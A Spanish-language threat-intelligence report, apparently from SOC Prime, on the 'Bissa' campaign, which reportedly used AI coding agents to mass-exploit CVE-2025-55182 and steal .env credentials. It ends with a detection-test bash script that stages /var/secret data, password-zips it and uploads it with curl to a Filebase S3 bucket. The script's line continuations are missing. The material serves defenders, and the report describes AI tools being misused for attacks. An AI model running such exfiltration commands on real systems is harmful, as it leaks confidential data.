SOC Prime Bias: Crítico

24 Apr 2026 15:19 UTC

Bissa Scanner Expuesto: Explotación Masiva Asistida por IA y Recolección de Credenciales

Author Photo
SOC Prime Team linkedin icon Seguir
Bissa Scanner Expuesto: Explotación Masiva Asistida por IA y Recolección de Credenciales
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Un servidor expuesto reveló una operación a gran escala que utilizó la plataforma de escaneo Bissa, Claude Code y OpenClaw para automatizar la explotación de objetivos expuestos a Internet mediante una vulnerabilidad React2Shell (CVE‑2025‑55182). La campaña recogió millones de archivos .env que contenían credenciales de alto valor de servicios de IA, nube, pagos y mensajería. Los datos recopilados se subieron a un bucket público S3 en Filebase para su posterior uso. La operación se dirigió a organizaciones en los sectores financiero, de criptomonedas y minorista.

Investigación

Analistas recuperaron más de 13,000 archivos que muestran el flujo de trabajo para escanear, explotar, validar y priorizar entornos de víctimas. Los registros confirmaron más de 900 compromisos exitosos utilizando el exploit React2Shell. Se utilizaron bots de Telegram para alertas en tiempo real, vinculando cada acierto con detalles de la víctima. El escáner también contenía un módulo para una vulnerabilidad de WordPress W3 Total Cache (CVE‑2025‑9501), aunque no se observó explotación exitosa.

Mitigación

Corrija las aplicaciones y marcos vulnerables oportunamente, especialmente los componentes React2Shell y WordPress W3 Total Cache. Mueva los secretos fuera de los archivos .env hacia gestores de secretos dedicados y rote las credenciales regularmente. Refuerce el acceso a los metadatos en la nube y aplique RBAC de mínimo privilegio. Supervise el tráfico saliente para detectar cargas no autorizadas a servicios de almacenamiento externo.

Respuesta

Implemente reglas de detección para la explotación de CVE‑2025‑55182 y cargas no autorizadas a S3. Bloquee dominios maliciosos conocidos y comunicaciones de bots de Telegram. Realice un análisis forense de los hosts comprometidos para localizar y eliminar cargas útiles residuales. Notifique a los usuarios afectados y rote cualquier credencial filtrada de inmediato.

"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef action fill:#99ccff classDef operator fill:#ff9900 %% Nodes tool_bissa_scanner["<b>Herramienta</b> – <b>Nombre</b>: Escáner Bissa<br/><b>Propósito</b>: Realizar escaneo activo masivo usando feeds de objetivos"] class tool_bissa_scanner tool tech_T1595_002["<b>Técnica</b> – <b>T1595.002 Escaneo Activo: Escaneo de Vulnerabilidades</b><br/><b>Descripción</b>: Escanea hosts expuestos a Internet para encontrar servicios vulnerables"] class tech_T1595_002 technique tech_T1190["<b>Técnica</b> – <b>T1190 Explotación de Aplicaciones Públicas</b><br/><b>Descripción</b>: Explotación de aplicaciones web vulnerables para obtener acceso inicial"] class tech_T1190 technique tool_react2shell["<b>Herramienta</b> – <b>Nombre</b>: React2Shell (CVE‑2025‑55182)<br/><b>Función</b>: Proporciona ejecución remota de código mediante carga útil de React crafter"] class tool_react2shell tool tech_T1210["<b>Técnica</b> – <b>T1210 Explotación de Servicios Remotos</b><br/><b>Descripción</b>: Ejecuta carga útil en servicios remotos para obtener ejecución de código"] class tech_T1210 technique tech_T1211["<b>Técnica</b> – <b>T1211 Explotación para Evasión de Defensas</b><br/><b>Descripción</b>: Usa vulnerabilidades para evadir defensas y permanecer oculto"] class tech_T1211 technique tech_T1552_001["<b>Técnica</b> – <b>T1552.001 Credenciales no aseguradas: Credenciales en Archivos</b><br/><b>Descripción</b>: Recopila credenciales almacenadas en archivos de configuración como .env"] class tech_T1552_001 technique tech_T1119["<b>Técnica</b> – <b>T1119 Recolección Automatizada</b><br/><b>Descripción</b>: Automatiza la validación, priorización y agrupamiento de datos recopilados para extracción"] class tech_T1119 technique tech_T1102_002["<b>Técnica</b> – <b>T1102.002 Servicio Web: Comunicación Bidireccional</b><br/><b>Descripción</b>: Usa servicios web (bots de Telegram) para intercambiar comandos y datos"] class tech_T1102_002 technique tool_telegram_bot["<b>Herramienta</b> – <b>Nombre</b>: Bots de Telegram @bissapwned_bot, @bissa_scan_bot<br/><b>Propósito</b>: Canal de comando y control"] class tool_telegram_bot tool tech_T1567_002["<b>Técnica</b> – <b>T1567.002 Exfiltración a través de Servicio Web: Exfiltración a Almacenamiento en la Nube</b><br/><b>Descripción</b>: Sube archivos robados a almacenamiento en la nube vía servicio web"] class tech_T1567_002 technique tool_filebase_bucket["<b>Herramienta</b> – <b>Nombre</b>: Bucket compatible con Filebase S3 (bissapromax)<br/><b>Propósito</b>: Almacena archivos de credenciales exfiltradas"] class tool_filebase_bucket tool tech_T1537["<b>Técnica</b> – <b>T1537 Transferencia de Datos a Cuenta en la Nube</b><br/><b>Descripción</b>: Mueve datos a una cuenta en la nube controlada por el atacante para recuperación posterior"] class tech_T1537 technique tech_T1068["<b>Técnica</b> – <b>T1068 Explotación para Escalación de Privilegios</b><br/><b>Descripción</b>: Aprovecha credenciales recopiladas para obtener privilegios más altos y movimiento lateral"] class tech_T1068 technique %% Conexiones tool_bissa_scanner –>|realiza| tech_T1595_002 tech_T1595_002 –>|identifica servicios vulnerables| tech_T1190 tech_T1190 –>|usa| tool_react2shell tool_react2shell –>|entrega carga útil a| tech_T1210 tech_T1210 –>|habilita| tech_T1211 tech_T1211 –>|permite| tech_T1552_001 tech_T1552_001 –>|alimenta en| tech_T1119 tech_T1119 –>|envía datos a través de| tech_T1102_002 tech_T1102_002 –>|implementado por| tool_telegram_bot tech_T1102_002 –>|exfiltra a| tech_T1567_002 tech_T1567_002 –>|almacena en| tool_filebase_bucket tool_filebase_bucket –>|habilita| tech_T1537 tech_T1537 –>|apoya a| tech_T1068 "

Flujo del Ataque

Ejecución de la simulación

Prerequisito: la Verificación de Prevuelo de Telemetría & Línea Base debe haber pasado.

  • Narrativa del Ataque y Comandos:
    El adversario ha recopilado un conjunto de documentos confidenciales de /var/secret/. Para evitar la detección, primero archivan los datos en un archivo ZIP protegido por contraseña, luego usan curl para cargar el archivo directamente al punto final S3 de Filebase a través del proxy corporativo. El proxy registra la URL completa de la solicitud, que coincide con la regla de detección.

  • Guion de Prueba de Regresión:

    #!/usr/bin/env bash
    set -euo pipefail
    
    # 1️⃣ Etapa de datos (T1074)
    STAGE_DIR="/tmp/staged_data"
    mkdir -p "$STAGE_DIR"
    cp -r /var/secret/* "$STAGE_DIR/"
    
    # 2️⃣ Archivar datos (T1560.001) – zip protegido por contraseña
    ARCHIVE="/tmp/exfil_archive.zip"
    ZIP_PASSWORD="P@ssw0rd!"
    zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null
    
    # 3️⃣ Exfiltrar vía punto final Filebase S3 (T1020)
    # Asumir que el proxy es alcanzable en http://proxy.company.local:3128
    FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip"
    curl -x http://proxy.company.local:3128 
         -T "$ARCHIVE" 
         -H "Host: s3.filebase.com" 
         -H "User-Agent: Mozilla/5.0" 
         "$FILEBASE_URL" 
         --silent --output /dev/null
    
    echo "Intento de exfiltración completado."
  • Comandos de Limpieza:

    # Eliminar archivos preparados y archivo
    rm -rf /tmp/staged_data /tmp/exfil_archive.zip
    
    # (Opcional) Vaciar conexiones del proxy si es necesario
    # Para Squid: squid -k rotate
    echo "Limpieza finalizada."